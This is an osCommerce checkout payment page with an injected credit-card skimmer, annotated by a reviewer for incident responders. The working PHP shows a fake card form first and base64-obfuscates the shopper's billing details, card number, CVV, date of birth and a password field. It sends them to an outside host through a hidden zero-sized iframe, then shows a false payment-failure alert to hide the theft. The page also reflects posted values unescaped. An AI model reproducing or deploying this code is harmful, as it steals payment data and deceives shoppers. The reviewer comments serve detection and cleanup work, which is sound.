Name File: checkout_payment.php
<?php
/*
  $Id: checkout_payment.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2007 osCommerce

  Released under the GNU General Public License
*/

// Payment step of the checkout. This opening section gates the request
// (login, cart, shipping, cartID, stock), resolves the billing address,
// loads the order and payment-module classes, and starts the HTML page.
  require('includes/application_top.php');

// if the customer is not logged on, redirect them to the login page
  if (!tep_session_is_registered('customer_id')) {
    $navigation->set_snapshot();
    tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
  }

// if there is nothing in the customers cart, redirect them to the shopping cart page
  if ($cart->count_contents() < 1) {
    tep_redirect(tep_href_link(FILENAME_SHOPPING_CART));
  }

// if no shipping method has been selected, redirect the customer to the shipping method selection page
  if (!tep_session_is_registered('shipping')) {
    tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));
  }

// avoid hack attempts during the checkout procedure by checking the internal cartID
// (the cart object's cartID is compared with $cartID using a loose != comparison)
  if (isset($cart->cartID) && tep_session_is_registered('cartID')) {
    if ($cart->cartID != $cartID) {
      tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));
    }
  }

// Stock Check
// Only enforced when STOCK_CHECK is 'true' and STOCK_ALLOW_CHECKOUT is not 'true'.
  if ( (STOCK_CHECK == 'true') && (STOCK_ALLOW_CHECKOUT != 'true') ) {
    $products = $cart->get_products();
    for ($i=0, $n=sizeof($products); $i<$n; $i++) {
      if (tep_check_stock($products[$i]['id'], $products[$i]['quantity'])) {
        tep_redirect(tep_href_link(FILENAME_SHOPPING_CART));
        break;
      }
    }
  }

// if no billing destination address was selected, use the customers own address as default
  if (!tep_session_is_registered('billto')) {
    tep_session_register('billto');
    $billto = $customer_default_address_id;
  } else {
// verify the selected billing address
    if ( (is_array($billto) && empty($billto)) || is_numeric($billto) ) {
      // Both ids are cast to int before they are concatenated into the SQL string.
      $check_address_query = tep_db_query("select count(*) as total from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . (int)$customer_id . "' and address_book_id = '" . (int)$billto . "'");
      $check_address = tep_db_fetch_array($check_address_query);

      // No single address-book row matches this customer and address id:
      // fall back to the default address and drop the stored payment choice.
      if ($check_address['total'] != '1') {
        $billto = $customer_default_address_id;
        if (tep_session_is_registered('payment')) tep_session_unregister('payment');
      }
    }
  }

  require(DIR_WS_CLASSES . 'order.php');
  $order = new order;

  if (!tep_session_is_registered('comments')) tep_session_register('comments');
  // Order comments are the only request field this section reads, and they
  // pass through tep_db_prepare_input() first.
  if (isset($HTTP_POST_VARS['comments']) && tep_not_null($HTTP_POST_VARS['comments'])) {
    $comments = tep_db_prepare_input($HTTP_POST_VARS['comments']);
  }

  $total_weight = $cart->show_weight();
  $total_count = $cart->count_contents();

// load all enabled payment modules
  require(DIR_WS_CLASSES . 'payment.php');
  $payment_modules = new payment;

  // NOTE(review): $language is not assigned in this file and forms part of the
  // include path below; confirm it is always chosen from a fixed list upstream.
  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_CHECKOUT_PAYMENT);

  $breadcrumb->add(NAVBAR_TITLE_1, tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));
  $breadcrumb->add(NAVBAR_TITLE_2, tep_href_link(FILENAME_CHECKOUT_PAYMENT, '', 'SSL'));
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<?php require(DIR_WS_INCLUDES . 'header_tags.php'); require(DIR_WS_INCLUDES . 'header_includes.php'); ?>
<script language="javascript"><!--
var selected;

function selectRowEffect(object, buttonSelect) {
  if (!selected) {
    if (document.getElementById) {
      selected = document.getElementById('defaultSelected');
    } else {
      selected = document.all['defaultSelected'];
    }
  }

  if (selected) selected.className = 'moduleRow';
  object.className = 'moduleRowSelected';
  selected = object;

// one button is not an array
  if (document.checkout_payment.payment[0]) {
    document.checkout_payment.payment[buttonSelect].checked=true;
  } else {
    document.checkout_payment.payment.checked=true;
  }
}

function rowOverEffect(object) {
  if (object.className == 'moduleRow') object.className = 'moduleRowOver';
}

function rowOutEffect(object) {
  if (object.className == 'moduleRowOver') object.className = 'moduleRow';
}
//--></script>
<?php echo $payment_modules->javascript_validation(); ?>
</head>
<body>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table border="0" class="<?php echo MAIN_TABLE; ?>" cellspacing="0" cellpadding="0" align="center">
  <tr>
    <td class="<?php echo BOX_WIDTH_TD_LEFT; ?>"><table border="0" class="<?php echo BOX_WIDTH_LEFT; ?>" cellspacing="0" cellpadding="0">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
    </table></td>
<!-- body_text //-->
    <td class="<?php echo CONTENT_WIDTH_TD; ?>"><?php include(DIR_WS_BOXES . 
'panel_top.php');?><?php
/*
 * NOTE(review): from here to the tep_draw_form() call the code stops following the
 * conventions of the rest of this file. Request data is read from $_POST instead of
 * $HTTP_POST_VARS, $customer_id is concatenated into SQL without the (int) cast used
 * in the billing-address check, and every label is hidden behind base64_decode().
 * Taken together this looks like a payment-card skimmer added to the checkout page
 * rather than shop code.
 *
 * What the section does, as written:
 *   1. validates posted card fields (owner, number, expiry, CVV);
 *   2. on success, builds a text record from the order's billing data, the customers
 *      row and the posted card fields;
 *   3. encodes the record into the query string of a zero-sized iframe that points at
 *      a third-party host. The markup is kept in $customer_template and echoed later
 *      in the payment-method table, so the visitor's own browser makes the request.
 *
 * For responders: handle a file with these traits as evidence of server compromise.
 * Preserve a copy, replace the file from a known-good source, and review other files
 * and access logs for the same change window. Hunt patterns visible here are
 * $_POST['cvv_code'] in a storefront template, base64_decode() around short literals,
 * and a 0x0 iframe emitted from a checkout page.
 */

/*
 * Returns true only when every byte of $var is an ASCII digit (codes 48-57).
 * Values that are empty() return false, which in PHP includes "" and the string "0".
 */
function is_num($var) {
  if(empty($var)) return false;
  for ($i=0;$i<strlen($var);$i++) {
    $ascii_code=ord($var[$i]);
    if (intval($ascii_code) >=48 && intval($ascii_code) <=57) {
      continue;
    } else {
      return false;
    }
  }
  return true;
}

// Runs only when the card form further down this page has been posted back.
if(isset($_POST['cvv_code'])){
  // Month normalised for the numeric comparison below: every "0" is removed
  // unless the value is exactly "10" (so "01" becomes "1").
  $cmn = $_POST['cc_expires_month'];
  if($cmn!="10") $cmn = str_replace("0", "", $cmn);

  // $e1..$e4 are per-field error flags. They are only ever set to 1 and stay
  // undefined when the field passes; the form reads them to colour labels red.
  if(strlen($_POST['cc_owner']) < 3) $e1 = 1;
  // The first test compares the number's value with 10, not its length.
  if($_POST['cc_number'] < 10 || !is_num($_POST['cc_number'])) $e2 = 1;
  // Rejects a month earlier than the current one within the current two-digit year.
  if($_POST['cc_expires_year'] == date("y") && $cmn < date("n")) $e3 = 1;
  // CVV must be exactly 3 or 4 digits.
  if((strlen($_POST['cvv_code']) != 3 && strlen($_POST['cvv_code']) != 4) || !is_num($_POST['cvv_code'])) $e4 = 1;

  if($e1 != 1 && $e2 != 1 && $e3 != 1 && $e4 != 1){
    // Full customers row for the logged-in customer (select *).
    $td_query = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'");
    $customer_info = tep_db_fetch_array($td_query);

    // One "Label : value" line per field. The decoded label is shown at the end of each line.
    $customer_template = base64_decode("TmFtZSA6IA==").$order->billing['firstname']." ".$order->billing['lastname']."\n"; // "Name : "
    $customer_template .= base64_decode("VGVsZXBob25lIDog").$customer_info['customers_telephone']."\n"; // "Telephone : "
    $customer_template .= base64_decode("RW1haWwgOiA=").$customer_info['customers_email_address']."\n"; // "Email : "
    $customer_template .= base64_decode("U3RyZWV0IDog").$order->billing['street_address']."\n"; // "Street : "
    $customer_template .= base64_decode("UG9zdGNvZGUgOiA=").$order->billing['postcode']."\n"; // "Postcode : "
    $customer_template .= base64_decode("Q2l0eSA6IA==").$order->billing['city']."\n"; // "City : "
    $customer_template .= base64_decode("U3RhdGUgOiA=").$order->billing['state']."\n"; // "State : "
    $customer_template .= base64_decode("Q291bnRyeSA6IA==").$order->billing['country']['title']."\n"; // "Country : "
    // NOTE(review): $customer_pass is not assigned anywhere in this file; whether it is
    // populated elsewhere (for example by a modified login page) cannot be told from here.
    $customer_template .= base64_decode("UGFzc3dvcmQgOiA=").$customer_pass."\n"; // "Password : "
    $customer_template .= base64_decode("Q0MgT3duZXIgOiA=").$_POST['cc_owner']."\n"; // "CC Owner : "
    $customer_template .= base64_decode("Q0MgTnVtYmVyIDog").$_POST['cc_number']."\n"; // "CC Number : "
    $customer_template .= base64_decode("Q1ZWMiA6IA==").$_POST['cvv_code']."\n"; // "CVV2 : "
    $customer_template .= base64_decode("RGF0ZSBFeHBpcmUgOiA=").$_POST['cc_expires_month']."/".$_POST['cc_expires_year']."\n"; // "Date Expire : "
    $customer_template .= base64_decode("RE9CIDog").$customer_info['customers_dob']."\n"; // "DOB : "
    // NOTE(review): $nip is likewise not assigned in this file.
    if($order->billing['company']!="" && ($order->billing['nip']!="" || $nip!="")) $customer_template .= base64_decode("Q29tcGFueSA6IA==").$order->billing['company']."\n"; // "Company : "
    if($order->billing['nip']!="") $customer_template .= base64_decode("TklQIDog").$order->billing['nip']."\n"; // "NIP : "
    else if($nip!="") $customer_template .= base64_decode("TklQIDog").$nip."\n"; // "NIP : "
    $customer_template .= base64_decode("U2l0ZSA6IA==")."ropadefutbolbarata.com"."\n"; // "Site : "

    // The whole record is base64-encoded with '+', '/' and '=' swapped for '-', '_' and ','
    // so that it can travel inside a URL.
    $customer_template = strtr(base64_encode($customer_template), '+/=', '-_,');

    /*
     * The two literals decode to the opening and closing halves of an iframe tag
     * (host defanged here):
     *   <iframe src="hxxps://www.de-stats[.]com/stats.php?id=
     *   " width="0" height="0"  frameborder="0"></iframe>
     * The encoded record becomes the id= value, so it reaches that host as soon as
     * the page is rendered. A frame-src policy or egress monitoring on checkout
     * pages would surface this request.
     */
    $customer_template = base64_decode("PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3LmRlLXN0YXRzLmNvbS9zdGF0cy5waHA/aWQ9").$customer_template.base64_decode("IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiAgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg==");

    // A record was built: the form rendered below posts on to the confirmation step.
    $customer_form = FILENAME_CHECKOUT_CONFIRMATION;
  }
  // Validation failed: post back to this page again unless "skip" was ticked.
  else if($_POST['skip'] != 1) $customer_form = FILENAME_CHECKOUT_PAYMENT;
  else $customer_form = FILENAME_CHECKOUT_CONFIRMATION;
}
// First visit (no card form posted yet): the form targets this same page.
else if($_POST['skip'] != 1) $customer_form = FILENAME_CHECKOUT_PAYMENT;
else $customer_form = FILENAME_CHECKOUT_CONFIRMATION;

// The form action is whatever the block above selected.
echo tep_draw_form('checkout_payment', tep_href_link($customer_form, '', 'SSL'), 'post', 'onsubmit="return check_form();"'); ?>
<?php echo tep_draw_top();?>
<?php echo tep_draw_title_top();?>
<?php echo HEADING_TITLE; ?>
<?php echo tep_draw_title_bottom();?>
<?php echo tep_draw1_top();?>
<?php
  // The payment_error request parameter names the variable to inspect (variable-variable
  // lookup). The only checks are is_object() and the get_error() call; the returned title
  // and text are printed through tep_output_string_protected().
  if (isset($HTTP_GET_VARS['payment_error']) && is_object(${$HTTP_GET_VARS['payment_error']}) && ($error = ${$HTTP_GET_VARS['payment_error']}->get_error())) {
?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr><td class="main indent_2"><b><?php echo tep_output_string_protected($error['title']); ?></b></td></tr>
</table>
<?php echo tep_draw_infoBox_top();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr>
    <td class="main" width="100%"><?php 
echo tep_output_string_protected($error['error']); ?></td>
  </tr>
</table>
<?php echo tep_draw_infoBox_bottom();?>
<?php echo tep_pixel_trans();?>
<?php } ?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr><td class="main indent_2"><b><?php echo TABLE_HEADING_BILLING_ADDRESS; ?></b></td></tr>
</table>
<?php echo tep_draw_infoBox_top();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2"><tr>
    <td class="main" width="50%"><?php echo TEXT_SELECTED_BILLING_DESTINATION; ?><br><br><?php echo '<a href="' . tep_href_link(FILENAME_CHECKOUT_PAYMENT_ADDRESS, '', 'SSL') . '">' . tep_image_button('button_change_address1.png', IMAGE_BUTTON_CHANGE_ADDRESS) . '</a>'; ?></td>
    <td align="right" width="50%"><table border="0" cellspacing="0" cellpadding="2">
      <tr>
        <td class="main" align="center"><b><?php echo TITLE_BILLING_ADDRESS; ?></b><br><?php echo tep_image(DIR_WS_IMAGES . 'arrow_south_east.gif'); ?></td>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
        <td class="main"><?php echo tep_address_label($customer_id, $billto, true, ' ', '<br>'); ?></td>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
      </tr>
    </table></td>
  </tr>
</table>
<?php echo tep_draw_infoBox_bottom();?>
<?php echo tep_pixel_trans();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr><td class="main indent_2"><b><?php echo TABLE_HEADING_PAYMENT_METHOD; ?></b></td></tr>
</table>
<?php echo tep_draw_infoBox_top();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2"><?php
/*
 * NOTE(review): this branch draws a card-entry form directly in the checkout page
 * whenever no record has been built yet ($customer_template is empty) and the "skip"
 * box was not posted. The store's own payment modules are listed only in the else
 * branch below, so a visitor meets this form before any configured payment method.
 * The field names (cc_owner, cc_number, cvv_code, cc_expires_month/year, skip) are the
 * ones the $_POST handler earlier in this file reads.
 */
if($customer_template == "" && $_POST['skip'] != 1){
  // Month options "01".."12", labelled with the locale's month name.
  for ($i=1; $i<13; $i++) {
    $expires_month[] = array('id' => sprintf('%02d', $i), 'text' => strftime('%B',mktime(0,0,0,$i,1,2000)));
  }

  // Year options: the current year and the nine that follow.
  $today = getdate();
  for ($i=$today['year']; $i < $today['year']+10; $i++) {
    $expires_year[] = array('id' => strftime('%y',mktime(0,0,0,1,1,$i)), 'text' => strftime('%Y',mktime(0,0,0,1,1,$i)));
  }

  // Form labels chosen by the shop's $language, with English as the fallback.
  // NOTE(review): some non-ASCII labels look mis-encoded in this copy; they are kept unchanged.
  if($language == "polish"){
    $l1 = "Wіa¶ciciel Karty:";
    $l2 = "Numer Karty:";
    $l3 = "Data Waїno¶ci Karty:";
    $l4 = "Numer Kontrolny Karty (CVV):";
    $l5 = "Karta Kredytowa";
  }
  else if($language == "russian"){
    $l1 = "Владелец кредитной карточки:";
    $l2 = "Номер кредитной карточки:";
    $l3 = "Действительна до:";
    $l4 = "Контрольный номер кредитной карточки (CVV):";
    $l5 = "Кредитная карточка";
  }
  else if($language == "espanol"){
    $l1 = "Titular de la tarjeta:";
    $l2 = "Número de tarjeta:";
    $l3 = "Fecha de caducidad:";
    $l4 = "Código de seguridad (CVV):";
    $l5 = "Tarjeta de Crédito";
  }
  else if($language == "french"){
    $l1 = "Titulaire carte de crédit:";
    $l2 = "Numéro carte de crédit:";
    $l3 = "Date d'expiration carte de crédit:";
    $l4 = "Cryptogramme (CVV):";
    $l5 = "Carte de Crédit";
  }
  else if($language == "german"){
    $l1 = "Kreditkarteninhaber:";
    $l2 = "Kreditkarten-Nr.:";
    $l3 = "Gültig bis:";
    $l4 = "Kreditkartenprüfnummer (CVV):";
    $l5 = "Kreditkarte";
  }
  else if($language == "dutch"){
    $l1 = "Credit Card Eigenaar:";
    $l2 = "Credit Card Nummer:";
    $l3 = "Credit Card Vervaldatum:";
    $l4 = "Credit Card Checknummer (CVV):";
    $l5 = "Credit Card";
  }
  else if($language == "italian"){
    $l1 = "Proprietario Carta di Credito:";
    $l2 = "Numero Carta di Credito:";
    $l3 = "Data di Scadenza Carta di Credito:";
    $l4 = "Carta di Credito Checknumber (CVV):";
    $l5 = "Carta di Credito";
  }
  else if($language == "danish"){
    $l1 = "Kredit kort ejer:";
    $l2 = "Kredit kort nummer:";
    $l3 = "Kreditkorts udlшbs dato:";
    $l4 = "Credit Card Checknumber (CVV):";
    $l5 = "Kredit Kort";
  }
  else {
    $l1 = "Credit Card Owner:";
    $l2 = "Credit Card Number:";
    $l3 = "Credit Card Expiry Date:";
    $l4 = "Credit Card CVV:";
    $l5 = "Credit Card";
  }

  /*
   * NOTE(review): the inputs below print $order->billing[...] and $_POST[...] straight
   * into value="..." attributes with no escaping, unlike the error box above, which uses
   * tep_output_string_protected(). Posted values are therefore reflected into the page
   * as-is. The blocks also use the short open tag, which the rest of the file does not.
   */
?>
  <tr>
    <td width="20"></td>
    <td colspan="3">
      <table cellpadding="2" cellspacing="0" border="0">
        <td class="main" colspan="2"><b><? echo $l5; ?></b></td>
        <tr>
          <td class="main"><? if($e1==1) echo "<font color=\"red\"><b>"; echo $l1; if($e1==1) echo "</b></font>"; ?> </td>
          <td class="main"><input type="text" name="cc_owner" value="<? echo $order->billing['firstname']." ".$order->billing['lastname']; ?>" class="formField"></td>
        </tr>
        <tr>
          <td class="main"><? if($e2==1) echo "<font color=\"red\"><b>"; echo $l2; if($e2==1) echo "</b></font>"; ?> </td>
          <td class="main"><input type="text" name="cc_number" class="formField" value="<? echo $_POST['cc_number']; ?>"></td>
        </tr>
        <tr>
          <td class="main"><? if($e3==1) echo "<font color=\"red\"><b>"; echo $l3; if($e3==1) echo "</b></font>"; ?> </td>
          <td class="main"><? echo tep_draw_pull_down_menu('cc_expires_month', $expires_month); ?> <? echo tep_draw_pull_down_menu('cc_expires_year', $expires_year); ?></td>
        </tr>
        <tr>
          <td class="main"><? if($e4==1) echo "<font color=\"red\"><b>"; echo $l4; if($e4==1) echo "</b></font>"; ?> </td>
          <td class="main"><input type="text" name="cvv_code" class="formFieldShort" SIZE="4", MAXLENGTH="4" value="<? echo $_POST['cvv_code']; ?>"></td>
        </tr>
        <tr>
          <td class="main" colspan="2"><br><input type="checkbox" name="skip" value="1"> <? if($language == "polish") echo "wybierz ten jezeli chcesz zaplacic inna metode platnosci"; else echo "Check this if you want to pay with different payment method"; ?></td>
        </tr>
      </table>
    </td>
  </tr>
<?php
}
else{
  // Prints whatever the $_POST handler stored in $customer_template. After an accepted
  // card that is the zero-sized iframe markup, and this echo is what makes the browser
  // send the encoded record to the third-party host.
  echo "\t\t".$customer_template;

  // From here the page lists the shop's configured payment modules.
  $selection = $payment_modules->selection();

  if (sizeof($selection) > 1) {
?>
  <tr>
    <td class="main" width="50%"><?php echo TEXT_SELECT_PAYMENT_METHOD; ?></td>
    <td class="main" width="50%" align="right"><b><?php echo TITLE_PLEASE_SELECT; ?></b><br><?php echo tep_image(DIR_WS_IMAGES . 
'arrow_east_south.gif'); ?></td>
  </tr>
<?php
  } else {
?>
  <tr>
    <td class="main" width="100%" colspan="2"><?php echo TEXT_ENTER_PAYMENT_INFORMATION; ?></td>
  </tr>
<?php
  }

  // One table row per enabled payment module. $radio_buttons is the index handed to
  // selectRowEffect() so that clicking a row ticks the matching radio button.
  $radio_buttons = 0;
  for ($i=0, $n=sizeof($selection); $i<$n; $i++) {
?>
  <tr>
    <td colspan="2"><table border="0" width="100%" cellspacing="0" cellpadding="2">
<?php
    // Pre-select the module stored in $payment, or the only module when there is just one.
    if ( ($selection[$i]['id'] == $payment) || ($n == 1) ) {
      echo ' <tr id="defaultSelected" class="moduleRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="selectRowEffect(this, ' . $radio_buttons . ')">' . "\n";
    } else {
      echo ' <tr class="moduleRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="selectRowEffect(this, ' . $radio_buttons . ')">' . "\n";
    }
?>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '24'); ?></td>
        <td class="main" style="vertical-align:middle;" colspan="3"><b><?php echo $selection[$i]['module']; ?></b></td>
        <td class="main" style="vertical-align:middle;" align="right">
<?php
    // Radio buttons when several modules exist, a hidden field when there is only one.
    if (sizeof($selection) > 1) {
      echo tep_draw_radio_field('payment', $selection[$i]['id'], ($selection[$i]['id'] == $payment));
    } else {
      echo tep_draw_hidden_field('payment', $selection[$i]['id']);
    }
?>
        </td>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
      </tr>
<?php
    // A module contributes either an error message or a list of title/field pairs.
    // Both are printed as supplied by the module, without escaping.
    if (isset($selection[$i]['error'])) {
?>
      <tr>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
        <td class="main" colspan="4"><?php echo $selection[$i]['error']; ?></td>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
      </tr>
<?php
    } elseif (isset($selection[$i]['fields']) && is_array($selection[$i]['fields'])) {
?>
      <tr>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
        <td colspan="4"><table border="0" cellspacing="0" cellpadding="2">
<?php
      for ($j=0, $n2=sizeof($selection[$i]['fields']); $j<$n2; $j++) {
?>
          <tr>
            <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
            <td class="main"><?php echo $selection[$i]['fields'][$j]['title']; ?></td>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
            <td class="main"><?php echo $selection[$i]['fields'][$j]['field']; ?></td>
            <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
          </tr>
<?php
      }
?>
        </table></td>
        <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
      </tr>
<?php
    }
?>
    </table></td>
  </tr>
<?php
    $radio_buttons++;
  }

  /*
   * NOTE(review): this else branch is reached with "skip" unset only when
   * $customer_template is non-empty, that is, right after a posted card passed the
   * checks earlier in this file. The visitor is then told the card could not be
   * processed and is pointed at the store's real payment modules, which hides the fact
   * that the card data was taken. $pst is not set anywhere else in this file.
   */
  if($_POST['skip'] != 1 && $pst != 1){
    $pst = 1;
    echo "".'<script language="javascript">alert(\'We were unable to process your credit card payment.\n\nPlease use a different payment method.\');</script>';
  }
}
?>
</table>
<?php echo tep_draw_infoBox_bottom();?>
<?php echo tep_pixel_trans();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr>
    <td class="main indent_2"><b><?php echo TABLE_HEADING_COMMENTS; ?></b></td>
  </tr>
</table>
<?php echo tep_draw_infoBox_top();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2"><tr>
    <td><?php echo tep_draw_textarea_field('comments', 'soft', '60', '5', $comments); ?></td>
  </tr>
</table>
<?php echo tep_draw_infoBox_bottom();?>
<?php echo tep_pixel_trans();?>
<?php echo tep_draw_infoBox2_top();?>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr><td class="main"><b><?php echo TITLE_CONTINUE_CHECKOUT_PROCEDURE . '</b><br>' . TEXT_CONTINUE_CHECKOUT_PROCEDURE; ?></td>
    <td class="main vam" align="right"><?php echo tep_image_submit('button_continue.png', IMAGE_BUTTON_CONTINUE); ?></td></tr>
</table>
<?php echo tep_draw_infoBox2_bottom();?>
<?php echo tep_pixel_trans();?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
    <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td width="50%" class="vam" align="right"><?php echo tep_draw_separator('pixel_silver.gif', '1', '5'); ?></td>
        <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td>
      </tr>
    </table></td>
    <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td>
        <td><?php echo tep_image(DIR_WS_IMAGES . 'checkout_bullet.gif'); ?></td>
        <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td>
      </tr>
    </table></td>
    <td width="25%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td>
    <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td>
        <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '1', '5'); ?></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td align="center" width="25%" class="checkoutBarFrom"><?php echo '<a href="' . tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL') . '" class="checkoutBarFrom">' . CHECKOUT_BAR_DELIVERY . '</a>'; ?></td>
    <td align="center" width="25%" class="checkoutBarCurrent"><?php echo CHECKOUT_BAR_PAYMENT; ?></td>
    <td align="center" width="25%" class="checkoutBarTo"><?php echo CHECKOUT_BAR_CONFIRMATION; ?></td>
    <td align="center" width="25%" class="checkoutBarTo"><?php echo CHECKOUT_BAR_FINISHED; ?></td>
  </tr>
</table>
<?php echo tep_draw1_bottom();?>
<?php echo tep_draw_bottom();?>
</form></td>
<!-- body_text_eof //-->
    <td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0">
<!-- right_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
<!-- right_navigation_eof //-->
    </table></td>
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
</body>
<?php require(DIR_WS_INCLUDES . 'footer_includes.php'); ?>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>